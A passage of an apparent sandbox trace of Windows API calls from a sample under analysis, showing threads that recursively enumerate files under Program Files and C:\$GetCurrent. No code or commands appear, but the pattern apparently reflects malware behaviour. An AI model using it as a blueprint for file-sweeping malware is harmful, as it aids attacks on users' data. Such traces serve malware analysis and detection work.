ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName=".", cAlternateFileName="")) returned 0xf58ee8 [0045.186] FindNextFileW (in: hFindFile=0xf58ee8, lpFindFileData=0x31af2a0 | out: lpFindFileData=0x31af2a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="..", cAlternateFileName="")) returned 1 [0045.187] FindNextFileW (in: hFindFile=0xf58ee8, lpFindFileData=0x31af2a0 | out: lpFindFileData=0x31af2a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1025", cAlternateFileName="")) returned 1 [0047.531] FindNextFileW (in: hFindFile=0xf71a80, lpFindFileData=0x31aeb14 | out: lpFindFileData=0x31aeb14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6340300, ftCreationTime.dwHighDateTime=0x1d0d6b2, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0xd6340300, ftLastWriteTime.dwHighDateTime=0x1d0d6b2, nFileSizeHigh=0x0, nFileSizeLow=0x5898, dwReserved0=0x0, dwReserved1=0x0, cFileName="vstoee90.tlb", cAlternateFileName="")) returned 1 [0047.531] ResetEvent (hEvent=0x2e8) returned 1 [0047.531] WaitForSingleObject (hHandle=0x2e8, dwMilliseconds=0xffffffff) returned 0x0 [0047.538] FindNextFileW (in: hFindFile=0xf71a80, lpFindFileData=0x31aeb14 | out: lpFindFileData=0x31aeb14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6340300, ftCreationTime.dwHighDateTime=0x1d0d6b2, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0xd6340300, ftLastWriteTime.dwHighDateTime=0x1d0d6b2, nFileSizeHigh=0x0, nFileSizeLow=0x5898, dwReserved0=0x0, dwReserved1=0x0, cFileName="vstoee90.tlb", cAlternateFileName="")) returned 0 [0047.538] FindClose (in: hFindFile=0xf71a80 | out: hFindFile=0xf71a80) returned 1 [0047.539] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x33a02c0 | out: hHeap=0x2a60000) returned 1 [0047.539] FindNextFileW (in: hFindFile=0xf72040, lpFindFileData=0x31aed98 | out: lpFindFileData=0x31aed98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ecb94e, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4ae972f5, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTO", cAlternateFileName="")) returned 0 [0047.539] FindClose (in: hFindFile=0xf72040 | out: hFindFile=0xf72040) returned 1 [0047.539] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ca00a0 | out: hHeap=0x2a60000) returned 1 [0047.539] FindNextFileW (in: hFindFile=0xf71f80, lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c11068, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0047.540] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\*", lpFindFileData=0x31aed98 | out: lpFindFileData=0x31aed98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c11068, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71d40 [0047.540] FindNextFileW (in: hFindFile=0xf71d40, lpFindFileData=0x31aed98 | out: lpFindFileData=0x31aed98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c11068, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.540] FindNextFileW (in: hFindFile=0xf71d40, lpFindFileData=0x31aed98 | out: lpFindFileData=0x31aed98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440ad34a, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440ad34a, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440ad34a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="verisign.bmp", cAlternateFileName="")) returned 1 [0047.540] ResetEvent (hEvent=0x2e8) returned 1 [0047.540] WaitForSingleObject (hHandle=0x2e8, dwMilliseconds=0xffffffff) returned 0x0 [0047.547] FindNextFileW (in: hFindFile=0xf71d40, lpFindFileData=0x31aed98 | out: lpFindFileData=0x31aed98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440ad34a, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440ad34a, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440ad34a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="verisign.bmp", cAlternateFileName="")) returned 0 [0047.548] FindClose (in: hFindFile=0xf71d40 | out: hFindFile=0xf71d40) returned 1 [0047.548] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ca00a0 | out: hHeap=0x2a60000) returned 1 [0047.548] FindNextFileW (in: hFindFile=0xf71f80, lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c5f95f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0047.548] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\*", lpFindFileData=0x31aed98 | out: lpFindFileData=0x31aed98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c5f95f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf72000 [0047.548] FindNextFileW (in: hFindFile=0xf72000, lpFindFileData=0x31aed98 | out: lpFindFileData=0x31aed98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c5f95f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.548] FindNextFileW (in: hFindFile=0xf72000, lpFindFileData=0x31aed98 | out: lpFindFileData=0x31aed98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0cb0a3f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71169cb5, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ado", cAlternateFileName="")) returned 1 [0047.548] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*", lpFindFileData=0x31aeb14 | out: lpFindFileData=0x31aeb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0cb0a3f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71169cb5, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf72040 [0047.548] FindNextFileW (in: hFindFile=0xf72040, lpFindFileData=0x31aeb14 | out: lpFindFileData=0x31aeb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0cb0a3f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71169cb5, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.548] FindNextFileW (in: hFindFile=0xf72040, lpFindFileData=0x31aeb14 | out: lpFindFileData=0x31aeb14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a0c6a1, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x52a0c6a1, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x52a0c6a1, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3a08, dwReserved0=0x0, dwReserved1=0x0, cFileName="adojavas.inc", cAlternateFileName="")) returned 1 [0047.548] ResetEvent (hEvent=0x2e8) returned 1 [0047.548] WaitForSingleObject (hHandle=0x2e8, dwMilliseconds=0xffffffff) returned 0x0 [0047.556] ResetEvent (hEvent=0x2e8) returned 1 [0047.556] WaitForSingleObject (hHandle=0x2e8, dwMilliseconds=0xffffffff) returned 0x0 [0047.560] FindNextFileW (in: hFindFile=0xf72040, lpFindFileData=0x31aeb14 | out: lpFindFileData=0x31aeb14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x529e643a, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x529e643a, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x529e643a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3b5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="adovbs.inc", cAlternateFileName="")) returned 1 [0047.560] ResetEvent (hEvent=0x2e8) returned 1 [0047.561] WaitForSingleObject (hHandle=0x2e8, dwMilliseconds=0xffffffff) returned 0x0 [0047.569] FindNextFileW (in: hFindFile=0xf72040, lpFindFileData=0x31aeb14 | out: lpFindFileData=0x31aeb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0cb2730, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0047.570] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", lpFindFileData=0x31ae890 | out: lpFindFileData=0x31ae890*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0cb2730, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71c80 [0047.570] FindNextFileW (in: hFindFile=0xf71c80, lpFindFileData=0x31ae890 | out: lpFindFileData=0x31ae890*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0cb2730, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.570] FindNextFileW (in: hFindFile=0xf71c80, lpFindFileData=0x31ae890 | out: lpFindFileData=0x31ae890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b9483e2, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb3fb1900, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x4600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll.mui", cAlternateFileName="")) returned 1 [0047.570] ResetEvent (hEvent=0x2e8) returned 1 [0047.570] WaitForSingleObject (hHandle=0x2e8, dwMilliseconds=0xffffffff) returned 0x0 [0047.576] FindNextFileW (in: hFindFile=0xf71c80, lpFindFileData=0x31ae890 | out: lpFindFileData=0x31ae890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b9483e2, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb3fb1900, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x4600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll.mui", cAlternateFileName="")) returned 0 [0047.576] FindClose (in: hFindFile=0xf71c80 | out: hFindFile=0xf71c80) returned 1 [0047.576] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3cf00c8 | out: hHeap=0x2a60000) returned 1 [0047.576] FindNextFileW (in: hFindFile=0xf72040, lpFindFileData=0x31aeb14 | out: lpFindFileData=0x31aeb14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43854cb5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x43854cb5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x43854cb5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll", cAlternateFileName="")) returned 1 [0047.576] ResetEvent (hEvent=0x2e8) returned 1 [0047.576] WaitForSingleObject (hHandle=0x2e8, dwMilliseconds=0xffffffff) returned 0x0 [0047.583] ResetEvent (hEvent=0x2e8) returned 1 [0047.583] WaitForSingleObject (hHandle=0x2e8, dwMilliseconds=0xffffffff) returned 0x0 [0047.592] FindNextFileW (in: hFindFile=0xf72040, lpFindFileData=0x31aeb14 | out: lpFindFileData=0x31aeb14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463fb128, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xced4b5c5, ftLastAccessTime.dwHighDateTime=0x1d2fa09, ftLastWriteTime.dwLowDateTime=0x463fb128, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x12d400, dwReserved0=0x0, dwReserved1=0x0, cFileName="msado15.dll", cAlternateFileName="")) returned 1 [0047.592] GetLastError () returned 0x12 [0047.592] SetLastError (dwErrCode=0x12) [0047.592] GetLastError () returned 0x12 [0047.592] ResetEvent (hEvent=0x2e8) returned 1 [0047.592] WaitForSingleObject (hHandle=0x2e8, dwMilliseconds=0xffffffff) returned 0x0 [0047.599] FindNextFileW (in: hFindFile=0xf72040, lpFindFileData=0x31aeb14 | out: lpFindFileData=0x31aeb14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41cc3017, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41cc3017, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41cc3017, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msado20.tlb", cAlternateFileName="")) returned 1 [0047.600] GetLastError () returned 0x12 [0047.600] ResetEvent (hEvent=0x2e8) returned 1 [0047.600] WaitForSingleObject (hHandle=0x2e8, dwMilliseconds=0xffffffff) returned 0x0 [0047.604] FindNextFileW (in: hFindFile=0xf72040, lpFindFileData=0x31aeb14 | out: lpFindFileData=0x31aeb14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41cc3017, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41cc3017, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41cc3017, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd200, dwReserved0=0x0, dwReserved1=0x0, cFileName="msado21.tlb", cAlternateFileName="")) returned 1 [0047.604] GetLastError () returned 0x12 [0047.605] ResetEvent (hEvent=0x2e8) returned 1 [0047.605] WaitForSingleObject (hHandle=0x2e8, dwMilliseconds=0xffffffff) returned 0x0 [0047.790] FindNextFileW (in: hFindFile=0xf72040, lpFindFileData=0x31aeb14 | out: lpFindFileData=0x31aeb14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41cc3017, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41cc3017, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41cc3017, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msado25.tlb", cAlternateFileName="")) returned 1 [0047.790] GetLastError () returned 0x12 [0047.790] ResetEvent (hEvent=0x2e8) returned 1 [0047.790] WaitForSingleObject (hHandle=0x2e8, dwMilliseconds=0xffffffff) returned 0x0 [0048.051] FindNextFileW (in: hFindFile=0xf72040, lpFindFileData=0x31aeb14 | out: lpFindFileData=0x31aeb14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41cc3017, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41cc3017, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41cc3017, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x11400, dwReserved0=0x0, dwReserved1=0x0, cFileName="msado26.tlb", cAlternateFileName="")) returned 1 [0048.051] GetLastError () returned 0x12 Thread: id = 30 os_tid = 0xd9c [0044.992] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x38) returned 0x2a69d08 [0044.992] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x18) returned 0x2a61518 [0044.992] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x2c0 [0044.992] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x2d0 [0044.992] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x2d4 [0044.992] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10000) returned 0x32f0048 [0044.993] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x9b3a08, lpParameter=0x32efb10, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2d8 [0044.993] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x9b3a08, lpParameter=0x32efb10, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2dc [0044.994] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10000) returned 0x3300050 [0044.994] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x32ef884 | out: lpFindFileData=0x32ef884*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a60000, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0xf58e28 [0044.994] GetLastError () returned 0x0 [0044.994] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x214) returned 0x3310058 [0044.995] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0044.995] GetCurrentThreadId () returned 0xd9c [0044.995] SetLastError (dwErrCode=0x0) [0044.995] GetLastError () returned 0x0 [0044.995] SetLastError (dwErrCode=0x0) [0044.995] GetLastError () returned 0x0 [0044.995] SetLastError (dwErrCode=0x0) [0044.995] GetLastError () returned 0x0 [0044.995] SetLastError (dwErrCode=0x0) [0044.995] GetLastError () returned 0x0 [0044.995] SetLastError (dwErrCode=0x0) [0044.995] GetLastError () returned 0x0 [0044.995] SetLastError (dwErrCode=0x0) [0044.995] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10000) returned 0x3310278 [0044.996] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\*", lpFindFileData=0x32ef600 | out: lpFindFileData=0x32ef600*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName=".", cAlternateFileName="")) returned 0xf590a8 [0044.997] FindNextFileW (in: hFindFile=0xf590a8, lpFindFileData=0x32ef600 | out: lpFindFileData=0x32ef600*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="..", cAlternateFileName="")) returned 1 [0044.998] FindNextFileW (in: hFindFile=0xf590a8, lpFindFileData=0x32ef600 | out: lpFindFileData=0x32ef600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="Logs", cAlternateFileName="")) returned 1 [0044.998] GetLastError () returned 0x0 [0044.998] SetLastError (dwErrCode=0x0) [0044.998] GetLastError () returned 0x0 [0044.998] SetLastError (dwErrCode=0x0) [0044.998] GetLastError () returned 0x0 [0044.998] SetLastError (dwErrCode=0x0) [0044.998] GetLastError () returned 0x0 [0044.998] SetLastError (dwErrCode=0x0) [0044.998] GetLastError () returned 0x0 [0044.998] SetLastError (dwErrCode=0x0) [0044.998] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10000) returned 0x3320280 [0044.998] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf58e68 [0045.001] FindNextFileW (in: hFindFile=0xf58e68, lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.002] FindNextFileW (in: hFindFile=0xf58e68, lpFindFileData=0x32ef37c | out: lpFindFileData=0x32ef37c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0xafe5f7a, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xa6b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log", cAlternateFileName="DOWNLE~1.LOG")) returned 1 [0045.002] GetLastError () returned 0x0 [0045.002] SetLastError (dwErrCode=0x0) [0045.002] GetLastError () returned 0x0 [0045.002] SetLastError (dwErrCode=0x0) [0045.002] GetLastError () returned 0x0 [0045.002] SetLastError (dwErrCode=0x0) [0045.002] GetLastError () returned 0x0 [0045.002] SetLastError (dwErrCode=0x0) [0045.002] GetLastError () returned 0x0 [0045.002] SetLastError (dwErrCode=0x0) [0045.002] GetLastError () returned 0x0 [0045.002] SetLastError (dwErrCode=0x0) [0045.002] GetLastError () returned 0x0 [0045.002] SetLastError (dwErrCode=0x0) [0045.002] GetLastError () returned 0x0 [0045.002] SetLastError (dwErrCode=0x0) [0045.002] GetLastError () returned 0x0 [0045.002] SetLastError (dwErrCode=0x0) [0045.002] GetLastError () returned 0x0 [0045.002] SetLastError (dwErrCode=0x0) [0045.002] GetLastError () returned 0x0 [0045.002] SetLastError (dwErrCode=0x0) [0045.002] GetLastError () returned 